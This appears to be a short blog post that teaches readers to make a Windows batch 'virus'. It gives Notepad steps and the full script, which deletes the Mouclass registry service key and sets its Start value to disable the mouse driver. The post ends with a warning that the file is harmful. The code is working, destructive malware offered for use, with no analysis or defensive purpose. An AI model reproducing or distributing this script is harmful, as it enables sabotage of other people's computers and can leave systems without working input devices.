Step 01 - Open Notepad.
Step 02 - Copy below codes and paste on Notepad.
rem ---------------------------------
rem Disable Mouse
set
key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Step 03 - Save this file as virus.bat
Step 04 - All Done you just created your virus.
NOTE: This batch virus is harmfull it will disable your mouse so think before trying it on yourself.
No comments:
Post a Comment